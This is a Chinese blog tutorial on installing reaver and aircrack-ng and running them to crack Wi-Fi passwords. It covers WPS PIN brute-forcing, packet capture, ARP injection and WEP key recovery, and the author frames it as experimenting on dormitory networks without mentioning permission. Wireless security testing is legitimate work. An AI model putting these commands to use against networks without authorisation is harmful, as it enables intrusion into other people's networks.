reaver 和 aircrack-ng 安装与使用

reaver 和 aircrack-ng 安装与使用安装1.下载reaver最新版本(这里用1.4) 2.解压: tar-xvfreaver-1.4.tar.gz3.cdreaver-1.4/src4../configure5.sudomake6.sudomakeinstall如果缺少库的话在./configure 时会有提示。我在安装时提示缺少pcaplibrary.于是s

大家好,又见面了,我是你们的朋友全栈君。

安装
1. 下载 reaver最新版本 (这里用1.4) 
2. 解压:  

tar -xvf reaver-1.4.tar.gz
3. cd reaver-1.4/src
4. ./configure
5. sudo make
6. sudo make install

如果缺少库的话在./configure 时会有提示。我在安装时提示缺少pcap library. 于是
sudo apt-get install libsqlite3-dev

如果缺少库的话在make时会有提示。我在安装时提示缺少pcap library. 于是
sudo apt-get install libpcap0.8-dev
之后安装成功

使用
1. 把无线网卡设置成监听模式: sudo airmon-ng start wlan0
 

 

这样就将wlan0无线网卡设置与监听模式,监听网卡id为 mon0
2. 用wash来查看AP是不是支持WPS:
 

 

-方法1, 搜索附近AP: 运行sudo wash -i mon0 -C
 

 

-方法2, 使用已经获取的cap文件: wash-C -f xxx01.cap
 

如果目标SSID在WPSlock一栏显示no,则证明可以继续破解,否则请不要继续用reaver来进行破解
4. 发现目标SSID支持WPS, 执行:sudo reaver -i mon0 -b AP_MAC -vv
 

 

其中 -i  

后的参数是监听模式网卡id
 

 

 

 

 

 

-b 是目标路由的BSSID
 

 

 

 

 

 

-vv 显示详细信息
 

 

 

 

 

 

-L 防止路由WPS死锁
 

 

 

 

 

 

 
5. 在获得WPS PIN 之后可以快速破解登录密码,执行 

reaver -i mon0-b AP_Mac -p WPS_PIN 
 

 

其中 -i 

后的参数是监听模式网卡id
 

 

 

 

 

 

-b是目标路由的BSSID
 

 

 

 

 

 

-p是已经获取的WPS PIN

6.破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,
用ctrl+c退出或者直接关闭终端都是不行的。 

 

 

 

 

 

 
一般暴力破解WPS需要信号强度至少4-5格,这样的情况下,耗时平均为4-10个小时


ubuntu 12.04 安装和使用aircrack-ng 教程

最近《计算机网络》课程讲到密码学,又重新燃起了我对破解无线WIFI密码的热情。在宿舍可以收到好几个wifi,正好可以用来做实验。

本来破解无线密码用backtrack是最合适不过的,我也在虚拟机中玩过bt5。不过换了新笔记本后,并没有安装backtrack 5 的独立系统。用虚拟机中的BT5系统破解无线密码需要插外置的USB网卡。虽然从U盘启动backtrack 系统也很方便,不过我还没下好它的iso文件,所以只能作罢。

我想,既然backtrack是使用ubuntu 的软件源,那ubuntu中也应该有相应的软件,也就是说可以用ubuntu 来破解密码。一搜索,果然有,就是aircrack-ng。

于是打开终端输入以下命令来安装它
sudo apt-get install aircrack-ng

却提示
Package aircrack-ng is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
iw:i386 iw

E: Package ‘aircrack-ng’ has no installation candidate
竟然没有这个包,难道是因为我使用的是64位的ubuntu 12.04 系统的原因?

谷歌一下,发现不是,是因为某些原因aircrack-ng 已经从ubuntu 12.04的软件源中移除了,ubuntu 10.04中还有。
那怎么在ubuntu 12.04 中安装aircrack-ng 呢?可以从网上下载源码编译安装。

首先安装两个扩展
sudo apt-get install build-essential
sudo apt-get install libssl-dev

然后到http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz 下载最新版的aircrack-ng,解压它
tar -xvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
gedit common.mak
找到 CFLAGS ?= -g -W -Wall -Werror -O3 并把它改为
CFLAGS ?= -g -W -Wall -O3
保存好后,开始编译安装
make
sudo make install
完了之后它会提示 Run ‘airodump-ng-oui-update’ as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).
于是输入
sudo airodump-ng-oui-update
更新好后即可。
那怎么使用ubuntu 中的aircrack-ng 来破解无线密码呢?
ubuntu 中 aircrack-ng 使用教程
1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0
(wlan0是无线网卡的端口,可用命令 ifconfig 查看)

2、查看无线AP在终端中输入:
sudo airodump-ng mon0
(mon0 是启动监控模式后无线网的端口)
查看有哪些采用wep加密的AP在线,然后按 ctrl+c 中止,不要关闭终端。

3、抓包
打开另一个终端,输入:
sudo airodump-ng -c 6 –bssid AP’s MAC -w wep mon0
(-c 后面跟着的6是要破解的AP工作频道,–bissid后面跟着的AP’sMAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)

4、与AP建立虚拟连接
再打开一个新终端,输入:
sudo aireplay-ng -1 0 -a AP’s MAC -h My MAC mon0
(-h后面跟着的My MAC是自己的无线网卡的MAC地址,即ifconfig命令下wlan0对应的mac地址)

5、进行注入
成功建立虚拟连接后输入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My MAC mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)

6、解密
收集有15000个以上的DATA之后,另开一个终端,切换到aircrack-ng-1.1目录,执行以下命令
sudo aircrack-ng wep*.cap
进行解密
(如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多15000个之后就自动再运行,直到算出密码为至,注意此处文件的名字要与步骤3里面设置的名字一样,且*号是必需的)

7、收工
破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。

如果要卸载ubuntu 上的aircrack-ng,可切换到aircrack-ng-1.1 目录,执行
sudo make uninstall
最后在手动删除该目录及目录下的东西即可。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/140880.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • postMessage

    postMessageHTML5postMessage和onmessageAPI详细应用姜俊杰2013年1月10日发布WeiboGoogle+用电子邮件发送本页面0姜俊杰2013年1月

  • node读取文件操作

    node读取文件操作导言:nodejs中所有与文件相关的操作都在fs模块中,而读写操作又是我们会经常用到的操作,nodejs的fs模块针对读操作为我们提供了readFile,read,createReadStream三个方法,针对写操作为我们提供了writeFile,write,createWriteStream三个方法,下面分析一下它们的区别:一、readFile和writeFile1、readFile…

  • HOOK消息钩子

    HOOK消息钩子大致的过程是当系统I/O上发生一个事件时,系统捕获该事件,并向指定的应用程序的消息队列发送一个消息,应用程序从消息队列中顺次取出一个消息,交由系统调度相应的窗口回调程序进行消息处理。这里可以看到,从OS捕捉到消息开始处理,到最后交还给OS调度回调函数,就像走了一个循环,我自己理解这也是为什么叫做“回调函数”的原因之一。接下来我们要进行的HOOK就是在上面的第二步和第三步之间进行的额外工作。钩子机制允许应用程序截获(且或)处理window消息或特定事件。钩子实际上是一个处理消息的程序段,通过系统调用,把

  • 104规约 scada

    104规约 scada104规约的报文帧分为三类:I帧、S帧和U帧。I帧称为信息帧,长度一定大于6个字节,被称作长帧,用于传输数据;S帧称为确认帧,长度只有6个字节,被称作短帧,用于确认接收的I帧;U帧称为控制帧,长度只有6个字节,也被称作短帧,用于控制启动/停止/测试。长帧报文分为APCI和ASDU两个部分,而短帧报文只有APCI部分。APCI的6个字节是这样构成的:起动字符68H,1个字节;后面的报文长

  • Python之字典添加元素

    Python之字典添加元素手动推荐知识点字典创建->创建字典(7种方式)删除元素->字典删除元素(6种方式)修改元素->字典修改元素(4种方式)遍历元素->字典遍历元素(4种方式)查找元素->字典查找元素(3种方式)本文使用代码book_dict={“price”:500,”bookName”:”Python设计”,”weight”:”250g”}第一种方式:使用[]book_dict[“owner”]=”tyson”说明:中.

  • vue router.beforeEach(),详解「建议收藏」

    vue router.beforeEach(),详解「建议收藏」router.beforeEach()一般用来做一些进入页面的限制。比如没有登录,就不能进入某些页面,只有登录了之后才有权限查看某些页面。。。说白了就是路由拦截。第一步规定进入路由需不需要权限@/router/index.jsimportAfrom’@/components/a'{path:’/a’,name:’a’,component:…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号